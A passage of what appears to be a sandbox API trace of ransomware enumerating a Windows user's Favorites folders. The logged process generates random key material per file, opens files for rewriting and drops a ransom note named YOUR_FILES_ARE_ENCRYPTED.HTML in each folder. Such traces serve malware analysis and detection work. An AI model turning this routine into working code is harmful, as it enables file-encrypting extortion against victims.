cAlternateFileName="")) returned 1 [0167.348] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links") returned 39 [0167.348] GetProcessHeap () returned 0x270000 [0167.348] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.350] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links" [0167.350] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\*" [0167.350] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab4e47e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.350] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab4e47e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.351] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab4e47e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.351] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\desktop.ini") returned 51 [0167.351] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.351] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0167.351] lstrlenW (lpString=".ini") returned 4 [0167.351] PathFindExtensionW (pszPath="desktop.ini") 
returned=".ini" [0167.351] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd620c710, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0167.351] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\Web Slice Gallery.url") returned 61 [0167.351] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.351] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0167.351] lstrlenW (lpString=".url") returned 4 [0167.351] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0167.351] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.352] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=226) returned 1 [0167.352] CloseHandle (hObject=0x598) returned 1 [0167.352] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, 
ftLastWriteTime.dwLowDateTime=0xd620c710, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0167.352] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.352] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0167.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.354] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.356] CloseHandle (hObject=0x5ac) returned 1 [0167.356] GetProcessHeap () returned 0x270000 [0167.357] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.357] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0167.357] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft 
Websites") returned 52 [0167.357] GetProcessHeap () returned 0x270000 [0167.357] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.358] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites" [0167.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\*" [0167.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.360] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.360] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6174190, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0167.360] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 71 [0167.360] lstrcmpW (lpString1="IE Add-on site.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.360] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0167.360] lstrlenW (lpString=".url") returned 4 [0167.360] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0167.360] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.361] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.361] CloseHandle (hObject=0x598) returned 1 [0167.361] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6174190, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="IE site on Microsoft.com.url", 
cAlternateFileName="IESITE~1.URL")) returned 1 [0167.361] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 81 [0167.361] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.361] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0167.361] lstrlenW (lpString=".url") returned 4 [0167.361] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0167.361] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.362] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.362] CloseHandle (hObject=0x598) returned 1 [0167.362] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6174190, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0167.362] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 74 
[0167.362] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.362] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0167.362] lstrlenW (lpString=".url") returned 4 [0167.362] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0167.362] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.362] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.362] CloseHandle (hObject=0x598) returned 1 [0167.363] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0167.363] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 74 [0167.363] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.363] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0167.363] lstrlenW (lpString=".url") returned 4 [0167.363] PathFindExtensionW 
(pszPath="Microsoft At Work.url") returned=".url" [0167.363] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.363] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.363] CloseHandle (hObject=0x598) returned 1 [0167.363] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd61c0450, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0167.363] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 72 [0167.363] lstrcmpW (lpString1="Microsoft Store.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.363] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0167.363] lstrlenW (lpString=".url") returned 4 [0167.363] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0167.363] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\Microsoft Store.url" 
(normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.364] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=134) returned 1 [0167.364] CloseHandle (hObject=0x598) returned 1 [0167.364] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd61c0450, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0167.364] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0167.364] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0167.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\Microsoft Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\favorites\\microsoft websites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0167.364] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0167.366] CloseHandle (hObject=0x5ac) returned 1 [0167.367] GetProcessHeap () returned 0x270000 [0167.367] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.367] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0167.367] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites") returned 46 [0167.367] GetProcessHeap () returned 0x270000 [0167.367] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0167.367] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites" [0167.367] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\*" [0167.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.434] 
FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0167.434] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0167.435] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Autos.url") returned 60 [0167.435] lstrcmpW (lpString1="MSN Autos.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.435] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0167.435] lstrlenW (lpString=".url") returned 4 [0167.435] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0167.435] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.435] GetFileSizeEx 
(in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.435] CloseHandle (hObject=0x598) returned 1 [0167.435] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd619a2f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0167.436] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 68 [0167.436] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.436] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0167.436] lstrlenW (lpString=".url") returned 4 [0167.436] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0167.436] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5alr3u30d3\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0167.436] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0167.436] CloseHandle (hObject=0x598) returned 1 [0167.436] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, 
